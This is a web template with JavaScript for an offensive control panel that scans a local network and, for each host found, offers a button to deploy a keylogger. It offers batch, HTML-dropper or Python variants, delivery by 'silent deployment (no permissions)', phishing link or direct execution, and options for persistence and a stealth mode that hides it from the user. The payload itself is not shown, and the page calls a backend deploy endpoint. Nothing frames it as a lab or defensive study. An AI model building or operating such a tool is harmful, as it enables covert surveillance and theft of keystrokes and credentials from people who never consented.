{% extends "base.html" %}

{% block content %}
<div class="row">
    <div class="col-12">
        <h1 class="mb-4" style="color: #ff0033; text-shadow: 0 0 10px #ff0033; font-family: 'VT323', monospace;">
            <i class="fas fa-network-wired me-2"></i>Network Device Control <span class="cursor"></span>
        </h1>
        <div class="d-flex align-items-center mb-3">
            <span class="badge bg-danger me-2" style="text-transform: uppercase; letter-spacing: 1px;">Silent Deployment</span>
            <span class="badge" style="background-color: #333; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px;">No Permissions Required</span>
        </div>
    </div>
</div>

<!-- Network Device Discovery -->
<div class="row mb-4">
    <div class="col-12">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header d-flex justify-content-between align-items-center" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-search me-2"></i>Network Device Discovery
                </h5>
                <div>
                    <button id="discover-btn" class="btn btn-sm me-2" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="discoverDevices()">
                        <i class="fas fa-search me-1"></i>Scan Network
                    </button>
                    <button id="scan-all-btn" class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033; text-transform: uppercase; letter-spacing: 1px; font-family: 'Courier New', monospace;" onclick="scanAllDevices()">
                        <i class="fas fa-network-wired me-1"></i>Scan All Devices
                    </button>
                </div>
            </div>
            <div class="card-body" style="background-color: #0a0a0a;">
                <div id="discovery-status" class="mb-3" style="display: none;">
                    <div class="progress" style="height: 25px; background-color: #333;">
                        <div id="discovery-progress" class="progress-bar progress-bar-striped progress-bar-animated" role="progressbar" style="width: 0%; background-color: #ff0033;" aria-valuenow="0" aria-valuemin="0" aria-valuemax="100">0%</div>
                    </div>
                    <p class="mt-2 mb-0" style="color: #cccccc; font-family: 'Courier New', monospace;" id="discovery-message">Initializing network scan...</p>
                </div>
                <div id="devices-container">
                    <div class="text-center" style="color: #cccccc; font-family: 'Courier New', monospace;">
                        <p>Click "Scan Network" to discover devices on your local network</p>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Deployment Options -->
<div class="row mb-4">
    <div class="col-12">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-cog me-2"></i>Deployment Options
                </h5>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc; font-family: 'Courier New', monospace;">
                <div class="row">
                    <div class="col-md-6">
                        <div class="form-group mb-3">
                            <label for="keylogger-type" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">Keylogger Type:</label>
                            <select id="keylogger-type" class="form-select" style="background-color: #0a0a0a; color: #cccccc; border: 1px solid #333;">
                                <option value="batch">Windows Batch (Silent)</option>
                                <option value="html">HTML Dropper</option>
                                <option value="python">Python Script</option>
                            </select>
                        </div>
                    </div>
                    <div class="col-md-6">
                        <div class="form-group mb-3">
                            <label for="deployment-method" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">Deployment Method:</label>
                            <select id="deployment-method" class="form-select" style="background-color: #0a0a0a; color: #cccccc; border: 1px solid #333;">
                                <option value="silent">Silent Deployment (No Permissions)</option>
                                <option value="phishing">Phishing Link</option>
                                <option value="direct">Direct Execution</option>
                            </select>
                        </div>
                    </div>
                </div>
                <div class="form-check mb-3">
                    <input class="form-check-input" type="checkbox" id="persistence-check" checked style="background-color: #0a0a0a; border: 1px solid #ff0033;">
                    <label class="form-check-label" for="persistence-check">
                        Enable Persistence (Survive Reboots)
                    </label>
                </div>
                <div class="form-check mb-3">
                    <input class="form-check-input" type="checkbox" id="stealth-check" checked style="background-color: #0a0a0a; border: 1px solid #ff0033;">
                    <label class="form-check-label" for="stealth-check">
                        Enable Stealth Mode (Hide From User)
                    </label>
                </div>
            </div>
        </div>
    </div>
</div>

<!-- Deployment Status -->
<div class="row mb-4">
    <div class="col-12">
        <div class="card" style="border: 1px solid #333; background-color: #0a0a0a;">
            <div class="card-header" style="background-color: #0a0a0a; border-bottom: 1px solid #ff0033;">
                <h5 class="card-title mb-0" style="color: #ff0033; text-transform: uppercase; letter-spacing: 1px;">
                    <i class="fas fa-tasks me-2"></i>Deployment Status
                </h5>
            </div>
            <div class="card-body" style="background-color: #0a0a0a; color: #cccccc; font-family: 'Courier New', monospace;">
                <div id="deployment-log">
                    <p class="text-center">No deployment activity yet</p>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    // Function to scan all devices on all local networks
    function scanAllDevices() {
        const scanAllBtn = document.getElementById('scan-all-btn');
        const discoverBtn = document.getElementById('discover-btn');
        const discoveryStatus = document.getElementById('discovery-status');
        const discoveryProgress = document.getElementById('discovery-progress');
        const discoveryMessage = document.getElementById('discovery-message');
        const devicesContainer = document.getElementById('devices-container');
        
        // Disable buttons and show progress
        scanAllBtn.disabled = true;
        discoverBtn.disabled = true;
        discoveryStatus.style.display = 'block';
        devicesContainer.innerHTML = '';
        
        // Simulate progress
        let progress = 0;
        const progressInterval = setInterval(() => {
            progress += 2;
            if (progress > 95) {
                clearInterval(progressInterval);
            }
            discoveryProgress.style.width = `${progress}%`;
            discoveryProgress.setAttribute('aria-valuenow', progress);
            discoveryProgress.textContent = `${progress}%`;
            
            if (progress < 20) {
                discoveryMessage.textContent = 'Identifying all local networks...';
            } else if (progress < 40) {
                discoveryMessage.textContent = 'Scanning network segments...';
            } else if (progress < 60) {
                discoveryMessage.textContent = 'Identifying active hosts...';
            } else if (progress < 80) {
                discoveryMessage.textContent = 'Fingerprinting discovered devices...';
            } else {
                discoveryMessage.textContent = 'Analyzing device types and services...';
            }
        }, 300);
        
        // Make API call to scan all devices
        fetch('/api/scan_all_devices')
            .then(response => response.json())
            .then(data => {
                // Clear interval and set progress to 100%
                clearInterval(progressInterval);
                discoveryProgress.style.width = '100%';
                discoveryProgress.setAttribute('aria-valuenow', 100);
                discoveryProgress.textContent = '100%';
                discoveryMessage.textContent = 'Complete network scan finished!';
                
                // Display discovered devices
                setTimeout(() => {
                    renderEnhancedDevices(data.devices || []);
                    scanAllBtn.disabled = false;
                    discoverBtn.disabled = false;
                }, 500);
            })
            .catch(error => {
                console.error('Error scanning all devices:', error);
                clearInterval(progressInterval);
                discoveryStatus.style.display = 'none';
                devicesContainer.innerHTML = `<div class="alert alert-danger">Error scanning all devices: ${error.message}</div>`;
                scanAllBtn.disabled = false;
                discoverBtn.disabled = false;
            });
    }
    
    // Function to render enhanced device information
    function renderEnhancedDevices(devices) {
        const devicesContainer = document.getElementById('devices-container');
        
        if (devices.length === 0) {
            devicesContainer.innerHTML = `
                <div class="alert" style="background-color: #333; color: #cccccc; border: 1px solid #ff0033;">
                    No devices discovered on the network. Try scanning again.
                </div>
            `;
            return;
        }
        
        let html = `
            <div class="table-responsive">
                <table class="table table-dark table-hover" style="background-color: #0a0a0a; color: #cccccc; border: 1px solid #333;">
                    <thead>
                        <tr style="border-bottom: 1px solid #ff0033;">
                            <th scope="col" style="color: #ff0033;">IP Address</th>
                            <th scope="col" style="color: #ff0033;">Hostname</th>
                            <th scope="col" style="color: #ff0033;">Device Type</th>
                            <th scope="col" style="color: #ff0033;">Open Ports</th>
                            <th scope="col" style="color: #ff0033;">Services</th>
                            <th scope="col" style="color: #ff0033;">Status</th>
                            <th scope="col" style="color: #ff0033;">Actions</th>
                        </tr>
                    </thead>
                    <tbody>
        `;
        
        devices.forEach(device => {
            html += `
                <tr>
                    <td>${device.ip}</td>
                    <td>${device.hostname || 'Unknown'}</td>
                    <td>${device.device_type || 'Unknown'}</td>
                    <td>${device.open_ports ? device.open_ports.join(', ') : 'None'}</td>
                    <td>${device.services ? Object.entries(device.services).map(([port, service]) => `${port}: ${service}`).join('<br>') : 'None'}</td>
                    <td>
                        <span class="badge" style="background-color: #ff0033; color: #ffffff;">${device.status.toUpperCase()}</span>
                    </td>
                    <td>
                        <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033;" onclick="deployKeylogger('${device.ip}')">
                            <i class="fas fa-upload me-1"></i>Deploy
                        </button>
                    </td>
                </tr>
            `;
        });
        
        html += `
                    </tbody>
                </table>
            </div>
        `;
        
        devicesContainer.innerHTML = html;
    }

    // Function to discover network devices
    function discoverDevices() {
        const discoverBtn = document.getElementById('discover-btn');
        const discoveryStatus = document.getElementById('discovery-status');
        const discoveryProgress = document.getElementById('discovery-progress');
        const discoveryMessage = document.getElementById('discovery-message');
        const devicesContainer = document.getElementById('devices-container');
        
        // Disable button and show progress
        discoverBtn.disabled = true;
        discoveryStatus.style.display = 'block';
        devicesContainer.innerHTML = '';
        
        // Simulate progress (in a real app, this would be updated based on actual progress)
        let progress = 0;
        const progressInterval = setInterval(() => {
            progress += 5;
            if (progress > 95) {
                clearInterval(progressInterval);
            }
            discoveryProgress.style.width = `${progress}%`;
            discoveryProgress.setAttribute('aria-valuenow', progress);
            discoveryProgress.textContent = `${progress}%`;
            
            if (progress < 30) {
                discoveryMessage.textContent = 'Scanning local network segments...';
            } else if (progress < 60) {
                discoveryMessage.textContent = 'Identifying active hosts...';
            } else if (progress < 90) {
                discoveryMessage.textContent = 'Fingerprinting discovered devices...';
            } else {
                discoveryMessage.textContent = 'Finalizing device discovery...';
            }
        }, 200);
        
        // Make API call to discover devices
        fetch('/api/discover_devices')
            .then(response => response.json())
            .then(data => {
                // Clear interval and set progress to 100%
                clearInterval(progressInterval);
                discoveryProgress.style.width = '100%';
                discoveryProgress.setAttribute('aria-valuenow', 100);
                discoveryProgress.textContent = '100%';
                discoveryMessage.textContent = 'Network scan complete!';
                
                // Display discovered devices
                setTimeout(() => {
                    renderDevices(data.devices || []);
                    discoverBtn.disabled = false;
                }, 500);
            })
            .catch(error => {
                console.error('Error discovering devices:', error);
                clearInterval(progressInterval);
                discoveryStatus.style.display = 'none';
                devicesContainer.innerHTML = `<div class="alert alert-danger">Error discovering devices: ${error.message}</div>`;
                discoverBtn.disabled = false;
            });
    }
    
    // Function to render discovered devices
    function renderDevices(devices) {
        const devicesContainer = document.getElementById('devices-container');
        
        if (devices.length === 0) {
            devicesContainer.innerHTML = `
                <div class="alert" style="background-color: #333; color: #cccccc; border: 1px solid #ff0033;">
                    No devices discovered on the network. Try scanning again.
                </div>
            `;
            return;
        }
        
        let html = `
            <div class="table-responsive">
                <table class="table table-dark table-hover" style="background-color: #0a0a0a; color: #cccccc; border: 1px solid #333;">
                    <thead>
                        <tr style="border-bottom: 1px solid #ff0033;">
                            <th scope="col" style="color: #ff0033;">IP Address</th>
                            <th scope="col" style="color: #ff0033;">Hostname</th>
                            <th scope="col" style="color: #ff0033;">Open Ports</th>
                            <th scope="col" style="color: #ff0033;">Status</th>
                            <th scope="col" style="color: #ff0033;">Actions</th>
                        </tr>
                    </thead>
                    <tbody>
        `;
        
        devices.forEach(device => {
            html += `
                <tr>
                    <td>${device.ip}</td>
                    <td>${device.hostname}</td>
                    <td>${device.open_ports.join(', ') || 'None'}</td>
                    <td>
                        <span class="badge" style="background-color: #ff0033; color: #ffffff;">${device.status.toUpperCase()}</span>
                    </td>
                    <td>
                        <button class="btn btn-sm" style="background-color: #0a0a0a; color: #ff0033; border: 1px solid #ff0033;" onclick="deployKeylogger('${device.ip}')">
                            <i class="fas fa-upload me-1"></i>Deploy
                        </button>
                    </td>
                </tr>
            `;
        });
        
        html += `
                    </tbody>
                </table>
            </div>
        `;
        
        devicesContainer.innerHTML = html;
    }
    
    // Function to deploy keylogger to a device
    function deployKeylogger(targetIp) {
        const keyloggerType = document.getElementById('keylogger-type').value;
        const deploymentMethod = document.getElementById('deployment-method').value;
        const persistence = document.getElementById('persistence-check').checked;
        const stealth = document.getElementById('stealth-check').checked;
        const deploymentLog = document.getElementById('deployment-log');
        
        // Add log entry
        const timestamp = new Date().toLocaleTimeString();
        deploymentLog.innerHTML = `
            <div class="alert" style="background-color: #333; color: #cccccc; border: 1px solid #ff0033;">
                <strong style="color: #ff0033;">[${timestamp}]</strong> Deploying ${keyloggerType} keylogger to ${targetIp} using ${deploymentMethod} method...
            </div>
        ` + deploymentLog.innerHTML;
        
        // Make API call to deploy keylogger
        fetch('/api/deploy_keylogger', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                target_ip: targetIp,
                type: keyloggerType,
                method: deploymentMethod,
                persistence: persistence,
                stealth: stealth
            })
        })
        .then(response => response.json())
        .then(data => {
            // Update log with success message
            const successTimestamp = new Date().toLocaleTimeString();
            deploymentLog.innerHTML = `
                <div class="alert" style="background-color: #333; color: #cccccc; border: 1px solid #00ff00;">
                    <strong style="color: #00ff00;">[${successTimestamp}]</strong> ${data.message || 'Keylogger deployed successfully!'}
                </div>
            ` + deploymentLog.innerHTML;
        })
        .catch(error => {
            console.error('Error deploying keylogger:', error);
            // Update log with error message
            const errorTimestamp = new Date().toLocaleTimeString();
            deploymentLog.innerHTML = `
                <div class="alert" style="background-color: #333; color: #cccccc; border: 1px solid #ff0033;">
                    <strong style="color: #ff0033;">[${errorTimestamp}]</strong> Error deploying keylogger: ${error.message}
                </div>
            ` + deploymentLog.innerHTML;
        });
    }
</script>
{% endblock %}